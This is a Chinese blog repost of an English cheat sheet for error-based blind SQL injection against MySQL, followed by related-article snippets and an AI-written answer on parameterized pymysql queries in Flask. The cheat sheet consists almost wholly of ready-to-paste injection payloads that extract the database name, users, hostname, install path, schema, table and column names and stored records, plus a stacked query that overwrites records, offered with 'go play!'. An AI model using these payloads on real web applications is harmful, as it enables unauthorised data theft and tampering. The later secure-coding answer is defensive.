mysql (error based) blind sqli cheat sheet_2012到了!!!

最新推荐文章于 2025-11-29 18:01:51 发布
原创 最新推荐文章于 2025-11-29 18:01:51 发布 · 177 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库

本文提供了一套快速且实用的方法来利用MySQL的盲注漏洞。通过使用特定的SQL注入语句,可以获取当前数据库、用户、版本等信息,并进一步查询表名、列名及数据记录等内容。
mysql (error based) blind sqli cheat sheet_2012到了!!!
2012年01月10日
  Quick & Dirty MySQL (Error Based) Blind SQLi Cheat Sheet
  So, you have a web application vulnerable to Blind SQL Injection (test the param with single quote ' ) and you need dirty & quick cheats to dig deeper.
  Note: The data is fetched using a Hex() and a type casting with the cast() to make the query reliable and avoid bad characters and format strings issue (for example 0x00 as the last byte of every data fetched.) These payloads heavily rely on the information_schema database. So if you don't get the desired result, it just means that the remote database server doesn't have it.
  These payloads are only crafted for Error-based MySQL Blind SQL Injections using String type parameters. If you know what I'm talking about, go play!
  No more crap, straight to the point.
  1. To test blind injection
  Code:
  ' and 'x'='x
  2. To select the current database (Output will be in Hexadecimal, decode to ASCII
  Code:
  ' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  3. To find the current user
  Code:
  1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  4. To find MySQL Version
  Code:
  1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  5. Find current database
  Code:
  1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  6. To find the system user
  Code:
  1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  7. To find the hostname
  Code:
  1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  8. To find the installation directory
  Code:
  1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  9. To find the DB User
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  10. To find the databases
  Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting a response.
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  11. To count the number of tables in the selected database
  Note: Note this count as n
  Replace colored strings with appropriate value
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  12. To get the table names in the selected database
  Note: m-n implies execute this query starting from m, m+1…n-1
  Replace colored strings with appropriate value
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  13. To get number of columns in the selected table name
  Note: Note this count as n
  Replace colored strings with appropriate value
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  14. To get column names of a selected table name
  Note: m-n implies execute this query starting from m, m+1…n-1
  Replace colored strings with appropriate value
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  15. To count the number of records in a selected column
  Note: Remember this count as n
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  16. To fetch records from a selected column
  Note: m-n implies execute this query starting from m, m+1…n-1
  Replace colored strings with appropriate value
  Code:
  1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  17. Update a record in the selected column
  Code:
  1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--
  I will update the cheat sheets for other database servers too in separate posts. Keep watching. Till then take care and bye.
iteye_10559
关注
3.1 SQL盲注- 布尔盲注
n0d_xy的博客
04-14 643
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9409
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
Blind SQLi techniques
weixin_34008933的博客
04-08 166
http://websec.wordpress.com/2011/04/06/blind-sqli-techniques/ 转载于:https://blog.51cto.com/obnus/538368
mysql 布尔型盲注_Mysql 高级盲注之布尔型盲注【sqli blind
weixin_36381298的博客
02-07 314
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔型盲注做详细说明,关于其它的技巧,后续还会再单...
SQL Injection (Blind)之盲注(原理、分类、利用)
m0_59598029的博客
04-20 1248
在SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based
靶场sqli-labs的练习笔记(盲注Blind SQL、报错注入等)第二章
m0_55314368的博客
06-16 280
2.时间注入,页面返回的值只有一种的时候(即为无论输入什么结果都按照正常的进行处理0),那么这时候我们就需要通过时间函数进行时间注入,通过页面的相应时间进行判断语句是否输入正确。由于and必须两边的条件都要满足,左边id=1肯定是真值,那么如果length函数猜错不等于8的时候就会没有回显。同理若ascii(substr(database(),1,1))=116中成立则执行1即通过,如果不成立则休眠。从而才出他的完整性。左边id=1必定成立,若右边不成立则没有反应,若为正确的返回不同的结果。
Sqli_Edited_Version.zip
02-12
SQLI-LABS是一个学习SQLI的平台,可用于在web安全攻防、SQL注入中进行测试。但是由于新的php版本不兼容问题,原始的sqli会出现问题,这是热心网友修改过的版本,可以在新版本的php中使用。
《Beyond_SQLi_Obfuscate_and_Bypass》.pdf
11-28
总的来说,《Beyond SQLi: Obfuscate and Bypass》是一篇深入解析SQL注入攻击策略的宝贵资源,它揭示了攻击者如何巧妙地规避安全措施,并为防御者提供了对抗这些攻击的思路和实践建议。对于网络安全专业人士来说,...
精选资源
SQLi Dumper v.10.2_sqlidumper_
09-30
SQLi Dumper是一款针对SQL注入漏洞的工具,主要用于从受攻击的系统中提取数据库信息。在标题"SQLi Dumper v.10.2_sqlidumper_"中,我们可以看出这是该工具的第10.2版本,而"sqlidumper"标签进一步确认了工具的名称。...
精选资源
SQLi Dumper v.8.3_sqli_
09-30
SQLi Dumper v.8.3_sqli_ 是一个专门针对SQL注入漏洞的渗透测试工具,主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的...
sqli-labs练习(九)------GET-Blind-Time based-Single-Quotes
wkend的博客
07-25 653
payload:id=1,回显结果:You are in........... payload:id=1'%23,回显结果:You are in........... payload:id=1"%23,回显:You are in........... payload:id=1' and 1=1%23,回显:You are in........... payload:id...
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.youkuaiyun.com/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sql注入-error、boolean、time-based and 宽字节
我不是大牛
06-24 1940
1、Error-based SQL injection 利用前提: 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysqli_error() 优点: 不需要显示位 缺点: 需要输出mysqli_error( )的报错信息 通过floor报错 select 列1(count()) , 列2(concat()随机数) as x from 表 group by x; select c...
w3af简单使用教程
weixin_33674976的博客
12-09 746
w3af简单使用教程w3af是一个Web应用程序***和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.0×00 概述在BackTrack5R3下使用w3af测试Kioptri...
Sql Injection (Blind)
qq_45521281的博客
04-14 2036
SQL Injection (Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 基于页面响应方式的盲注分类 基于布尔的盲注: 即可以根据...
通过sqli-labs学习sql注入——基础挑战之less11-22
giantbranch的专栏
05-19 1万+
上一次就讲了基础挑战之less1-10,都是get型的,包含的种类也是比较多了,这次的是post型注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战之less1-10会有,这里不会讲以前讲过了知识了,还有盲注的python脚步哦,有需要的链接去看看 工具 还是火狐+hackbar插件 看看要post提交的字段吧,uname和p
通过sqli-labs学习sql注入——进阶挑战之less23-28a
giantbranch的专栏
06-10 1万+
本文链接:http://blog.youkuaiyun.com/u012763794/article/details/51457142   这次我又来了,Advanced Injections(进阶挑战),就是一些过滤绕过的东西了,基础挑战看这个两篇 最近搞逆向破解去了,http://www.giantbranch.cn/myblog/?p=27,所以这个拖得太久了,今天完工   通过sqli-la...
Redis服务安装自启动(Windows版)
最新发布
2509_94199043的博客
11-29 856
一般来说,一些中大型企业都会去采用 Linux 服务器来部署 Redis,而且 Redis 官方并没有提供 [Windows 版本](https://gitcode.com/gh_mirrors/wi/windows/overviewutm_source=highlight_word_gitcode&word=windows&isLogin=1 "Windows 版本")的安装包。
我要使用pymysql连接mysql数据库,这段代码 app = Flask(__name__) app.secret_key = 'pymysql_sqli_lab_secret_key_2024' 该如何改
10-08
<think>根据用户提供的上下文,用户想要将给定的Flask应用代码修改为使用pymysql连接MySQL数据库的正确形式。 用户给出的代码片段是: app = Flask(__name__) app.secret_key = 'pymysql_sqli_lab_secret_key_2024' 但用户之前的问题中提到了一个POST请求处理的代码片段,其中包含: if request.method == 'POST': product_id = request.form.get('product_id', '') conn = pymysql.connect() 因此,我们需要在Flask应用中正确地连接MySQL数据库,并且最好在一个视图函数中(比如处理POST请求的路由)使用数据库连接。 根据引用[1][2][3][4],我们知道如何初始化Flask应用。现在我们需要在视图函数中连接数据库。 在之前的回答中,我们已经给出了使用pymysql连接数据库的修正方案,包括使用环境变量来安全地获取数据库连接参数。 因此,修改步骤如下: 1. 安装pymysql库(如果尚未安装):`pip install pymysql` 2. 在代码中导入pymysql和os模块 3. 在视图函数中,使用环境变量配置数据库连接信息,并使用pymysql.connect()建立连接 4. 使用连接执行SQL查询(注意使用参数化查询防止SQL注入) 5. 使用上下文管理器(with语句)确保连接和游标正确关闭 6. 处理异常 下面是一个完整的示例,展示如何修改代码以在Flask应用中使用pymysql连接MySQL数据库。 注意:我们假设用户已经有了一个处理POST请求的路由(比如'/product'),我们将在这个路由中连接数据库并查询产品信息。 示例代码: </think>### 修改代码使用PyMySQL连接MySQL数据库 以下是正确使用PyMySQL连接MySQL数据库的完整实现方案,基于您的Flask应用结构: ```python from flask import Flask, request, redirect, session, flash import pymysql import os app = Flask(__name__) app.secret_key = 'pymysql_sqli_lab_secret_key_2024' # 会话密钥[^4] def get_db_connection(): """创建安全的数据库连接""" return pymysql.connect( host=os.getenv('DB_HOST', 'localhost'), user=os.getenv('DB_USER', 'root'), password=os.getenv('DB_PASSWORD', ''), database=os.getenv('DB_NAME', 'test_db'), port=int(os.getenv('DB_PORT', 3306)), charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor ) @app.route('/products', methods=['GET', 'POST']) def products(): if request.method == 'POST': try: # 1. 安全获取表单数据 product_id = request.form.get('product_id', '').strip() # 2. 输入验证 if not product_id or not product_id.isdigit(): flash('产品ID无效', 'error') return redirect(request.url) # 3. 连接数据库 with get_db_connection() as conn: with conn.cursor() as cursor: # 4. 参数化查询防止SQL注入 sql = "SELECT * FROM products WHERE id = %s" cursor.execute(sql, (product_id,)) product = cursor.fetchone() if not product: flash('未找到该产品', 'warning') return redirect(request.url) return render_template('product_detail.html', product=product) except pymysql.Error as e: app.logger.error(f"数据库错误: {e}") flash('服务器错误,请稍后再试', 'danger') return redirect(request.url) # GET请求处理 try: with get_db_connection() as conn: with conn.cursor() as cursor: cursor.execute("SELECT id, name FROM products LIMIT 100") products = cursor.fetchall() return render_template('products.html', products=products) except pymysql.Error as e: app.logger.error(f"数据库连接失败: {e}") return "数据库服务不可用", 500 if __name__ == '__main__': app.run(host='0.0.0.0', port=9000) ``` ### 关键修改说明 1. **数据库连接函数** $$ \text{安全连接} = \text{环境变量配置} + \text{参数化连接} $$ ```python def get_db_connection(): return pymysql.connect(...) # 使用环境变量获取敏感信息[^3] ``` 2. **SQL注入防护** 使用参数化查询代替字符串拼接: ```python # 危险方式(易受SQL注入攻击) cursor.execute(f"SELECT * FROM products WHERE id = {product_id}") # 安全方式 cursor.execute("SELECT * FROM products WHERE id = %s", (product_id,)) ``` 3. **连接资源管理** 使用`with`语句确保自动关闭连接: ```python with get_db_connection() as conn: # 自动关闭连接 with conn.cursor() as cursor: # 自动关闭游标 ``` 4. **错误处理机制** - 捕获数据库异常`pymysql.Error` - 使用Flash消息系统反馈用户[^4] - 记录日志而非暴露细节 5. **环境变量配置** 启动前设置环境变量: ```bash export DB_HOST=mysql-server export DB_USER=app_user export DB_PASSWORD=your_secure_password export DB_NAME=product_db ``` ### 安全最佳实践 $$\text{安全} = \text{输入验证} + \text{参数化查询} + \text{最小权限原则}$$ 1. **最小权限原则** 为数据库用户分配仅需的权限: ```sql CREATE USER 'app_user'@'%' IDENTIFIED BY 'secure_password'; GRANT SELECT ON product_db.products TO 'app_user'@'%'; ``` 2. **输入验证** ```python # 验证产品ID为数字且长度合理 if not product_id.isdigit() or len(product_id) > 10: abort(400, "无效产品ID") ``` 3. **连接池优化** 高频访问建议使用连接池: ```python from dbutils.pooled_db import PooledDB pool = PooledDB( creator=pymysql, maxconnections=20, host=os.getenv('DB_HOST'), # ...其他参数 ) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值